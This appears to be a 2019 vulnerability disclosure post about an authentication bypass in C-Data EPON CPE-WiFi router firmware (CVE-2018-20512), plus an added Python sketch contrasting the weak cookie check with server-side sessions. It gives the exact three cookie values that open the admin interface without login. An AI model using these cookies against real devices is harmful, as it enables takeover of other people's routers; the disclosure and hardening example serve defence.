Wednesday, January 2, 2019

Vulnerability in C-Data Technologies EPON CPE-WiFi devices firmware v2.0.4-x000

I recently signed up to receive emails from Shadowserver regarding activity in my /19 and /20. Starting December 12, I started getting a lot of emails about IPs showing Mirai-like activity. After consolidating all of the reports and filtering for unique IPs, I was able to take a closer look at the devices. I noticed that all of the affected IPs were using our AdNet (branded) CPE-WiFi EPON units; the manufacturer is C-Data Technologies LTD.

I ran Nessus against the devices to see if there were any current vulnerabilities, and none were reported back. I took a closer look at the devices myself and noticed that the login cookie was not unique to the device/login.

I was able to use the Google Chrome developer console to send the following cookies on a device I was not logged in to:

document.cookie="cooLogin=1; path=/; expires=2018-12-28T12:03:02.000Z";

document.cookie="cooUser=admin; path=/; expires=2018-12-28T12:03:02.000Z";

document.cookie="timestamp=-1; path=/; expires=2018-12-28T12:03:02.000Z";

I then refreshed the login page and I was greeted with the Admin UI of the device.

I reached out to C-Data and AdNet but have yet to hear back from them since discovering the issue. I also requested a CVE for the issue, and it is currently reserved: CVE-2018-20512.

I've never requested a CVE before, so I'm not sure of the process to move that out of "RESERVED".

Anyway, just wanted to pass this bug along to /r/networking.

My temp fix was just to ACL port 80 at our core going to the affected customers.
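
Added example, not from the original post or the vendor's firmware: a minimal Python sketch of why cookies that are "not unique to the device/login" fail as authentication, next to a server-issued session token that cannot be set from the browser console. The firmware's real check is not shown in the post, so `weak_is_admin`, `SessionStore` and the `session` cookie name are hypothetical; only the three cookie names and values come from the post.

```python
import secrets
import time

SESSION_TTL = 300  # seconds (constructed value)
# Constructed Cookie header carrying the three values quoted in the post
FORGED = "cooLogin=1; cooUser=admin; timestamp=-1"

def parse_cookie_header(header):
    """Split a Cookie request header into a name -> value dict."""
    jar = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name] = value
    return jar

def weak_is_admin(cookies):
    # Assumed weak pattern: trusts fixed values that any client can set itself
    return cookies.get("cooLogin") == "1" and cookies.get("cooUser") == "admin"

class SessionStore:
    """Hardened form: identity lives server-side, keyed by a random token."""
    def __init__(self):
        self._sessions = {}  # token -> (user, expiry time)

    def login(self, user, password_ok, now=None):
        if not password_ok:
            return None
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[token] = (user, now + SESSION_TTL)
        return token

    def user_for(self, cookies, now=None):
        now = time.time() if now is None else now
        token = cookies.get("session", "")
        entry = self._sessions.get(token)
        if entry is None:
            return None  # unknown token: client-chosen cookies prove nothing
        user, expiry = entry
        if now >= expiry:
            self._sessions.pop(token)  # expiry is enforced by the server
            return None
        return user

if __name__ == "__main__":
    forged = parse_cookie_header(FORGED)
    print("weak check accepts forged cookies:", weak_is_admin(forged))
    print("session store accepts forged cookies:",
          SessionStore().user_for(forged) is not None)
```
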
